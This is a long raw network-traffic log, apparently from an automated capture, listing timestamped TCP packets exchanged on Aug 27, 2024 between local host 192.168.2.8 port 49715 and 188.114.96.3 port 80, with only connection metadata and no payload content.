                                Aug 27, 2024 09:49:36.415838003 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.415900946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415904045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.415914059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415958881 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.415983915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415997028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416007996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416022062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416030884 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416033030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416069031 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416161060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416177034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416188002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416198969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416203976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416232109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416254044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416266918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416301012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416506052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416524887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416538954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416551113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416563034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416563034 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416583061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416584969 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416596889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416609049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416615009 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416620970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416635036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416640043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416673899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416687012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416707039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416728973 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416743994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416755915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416765928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416779041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416788101 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416799068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.416850090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416862965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.416893959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.417587996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417599916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417618990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417630911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417649031 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417654037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.417678118 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.417738914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417742968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.417751074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417763948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417788982 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.417865992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417884111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417897940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417911053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417921066 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.417939901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.417989016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.417999983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418030977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.418060064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418072939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418097019 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.418379068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418390989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418401957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418414116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418427944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418438911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.418468952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.418534994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418714046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418808937 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.418833017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418844938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418859005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418884039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.418958902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.418998957 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.502434969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502475977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502489090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502573013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.502584934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502597094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502613068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502625942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502626896 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.502638102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502654076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.502686977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.502715111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502816916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502829075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502840042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502851963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502862930 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.502866030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502877951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.502887011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.502911091 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503065109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503074884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503087997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503138065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503140926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503149033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503201008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503207922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503284931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503295898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503307104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503361940 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503391981 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503411055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503423929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503434896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503448963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503454924 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503460884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503473997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503487110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503488064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503498077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503510952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503514051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503524065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503536940 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503551006 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503663063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503674030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503704071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503724098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503763914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503793001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503803968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503815889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503828049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503840923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.503849030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503865004 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.503999949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504010916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504020929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504034042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504045963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504057884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504069090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504074097 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.504157066 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.504183054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.504614115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504631996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504651070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504704952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.504745007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504756927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504770994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504786015 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.504812956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.504899979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504911900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504924059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504935980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504946947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504957914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.504971981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505024910 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.505043983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505117893 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.505484104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505530119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505541086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505580902 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.505589008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505600929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505625010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505626917 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.505636930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505721092 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.505744934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505757093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505769014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505780935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505783081 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.505817890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.505862951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505875111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505889893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505902052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.505901098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.505934000 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.506428957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506480932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506498098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506505966 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.506536007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.506582975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506594896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506604910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506617069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506628990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506635904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.506639957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506652117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506666899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506701946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506714106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506721973 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.506726027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.506752014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.507221937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.507302046 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.507313967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.507324934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.507364035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.507369041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.507379055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.507391930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.507402897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.507471085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.507489920 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.508312941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508323908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508336067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508393049 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.508533001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508543968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508554935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508568048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508575916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.508590937 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.508642912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508685112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.508711100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508724928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508768082 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.508840084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508851051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508862019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508872986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.508892059 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.508913994 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.589240074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589277029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589288950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589308977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589320898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589332104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589354038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589364052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589376926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589447975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589458942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589469910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589623928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589643002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589662075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589673996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589685917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589694977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589705944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589719057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589731932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589745998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589757919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589864969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589878082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589891911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589924097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589934111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589946985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.589960098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590049028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590061903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590079069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590092897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590168953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590181112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590192080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590204954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590276003 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.590321064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590332985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.590332985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590346098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590354919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590387106 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.590389967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590410948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590423107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590450048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.590503931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590516090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590527058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590538979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590539932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.590570927 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.590711117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590723038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590735912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590748072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590754032 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.590760946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590775013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.590795040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590801001 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.590848923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590861082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.590888023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.592520952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592557907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592572927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592577934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.592592955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592603922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592657089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592669010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592755079 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.592806101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592818975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592832088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592844009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592880964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.592897892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.592957020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592968941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592978954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.592991114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.593008041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.593028069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.593041897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.593447924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.593487024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.593497992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.593519926 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.593556881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.593568087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.593580008 CEST8049715188.114.96.3192.168.2.8
